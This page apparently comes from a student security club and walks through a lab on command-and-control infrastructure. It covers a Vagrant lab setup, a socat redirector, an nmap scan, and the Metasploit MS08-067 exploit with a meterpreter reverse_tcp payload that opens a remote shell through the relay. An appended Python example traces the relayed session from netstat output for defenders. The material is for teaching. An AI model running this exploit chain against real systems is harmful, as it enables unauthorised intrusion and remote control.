49th Security Division
We are a student organization dedicated to promoting knowledge of cybersecurity and teaching our members the fundamentals (along with advanced techniques) needed to prepare for the future of cybersecurity!
orgsync.com/79368/
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile
curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile
vagrant up
vagrant ssh winxp
ipconfig
vagrant ssh redir
sudo socat TCP4-LISTEN:443,fork TCP4:192.168.55.2:443
vagrant global-status
vagrant ssh kali
ifconfig
nmap -sT -O 192.168.55.0/24 -oA initial-network
ls
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp # This is the payload I set
show options # This shows all the options for the payload and exploit
set RHOST 192.168.55.3 # The host you are attacking
set LHOST 192.168.55.4 # The external IP that the payload should connect to
set LPORT 443 # External port that the payload will connect to
set ReverseListenerBindAddress 192.168.55.2 # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z # Start the exploit as a job. Do not automatically interact with new sessions.
## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
shell
# to show that the metasploit module isn't connected to your machine
netstat
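Added example (not part of the original slides): the final netstat step seen from the defender's side. It parses the victim's connection table, then the redirector's, to trace the relayed session back to the host behind it. Both netstat captures are constructed samples; the lab addresses are the ones used in the commands above.

```python
import re

# Lab addresses taken from the commands on this page.
KALI, VICTIM, REDIR = "192.168.55.2", "192.168.55.3", "192.168.55.4"

# Constructed sample: `netstat -an` on the Windows XP victim after the session opens.
VICTIM_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.55.3:1035      192.168.55.4:443       ESTABLISHED
"""

# Constructed sample: `netstat -tn` on the redirector while socat is relaying.
REDIR_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.55.4:443        192.168.55.3:1035       ESTABLISHED
tcp        0      0 192.168.55.4:48122      192.168.55.2:443        ESTABLISHED
tcp        0      0 192.168.55.4:22         10.0.2.2:51514          ESTABLISHED
"""

# Matches both the Windows layout and the Linux layout (which has two queue columns).
ROW = re.compile(r"\s*tcp\S*\s+(?:\d+\s+\d+\s+)?(\S+):(\d+)\s+(\S+):(\d+)\s+ESTABLISHED", re.I)

def established(text):
    """Return (local_ip, local_port, remote_ip, remote_port) for ESTABLISHED TCP rows."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rows

def peers(text):
    """Remote IPs a host is talking to, as that host sees them."""
    return {remote for _, _, remote, _ in established(text)}

def relayed_upstreams(text, client_ip):
    """On a relay host: find the local port client_ip connected to, then return the
    hosts the relay itself dials on that same port (the forwarded destination)."""
    conns = established(text)
    served = {lport for _, lport, remote, _ in conns if remote == client_ip}
    return {remote for _, _, remote, rport in conns if rport in served and remote != client_ip}

if __name__ == "__main__":
    print("victim sees:", peers(VICTIM_NETSTAT))
    print("behind the redirector:", relayed_upstreams(REDIR_NETSTAT, VICTIM))
```

The victim's table only ever shows the redirector's address, so an indicator taken from the compromised host identifies the relay; the host behind it appears only in the redirector's own connection table.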
By 49th Security Division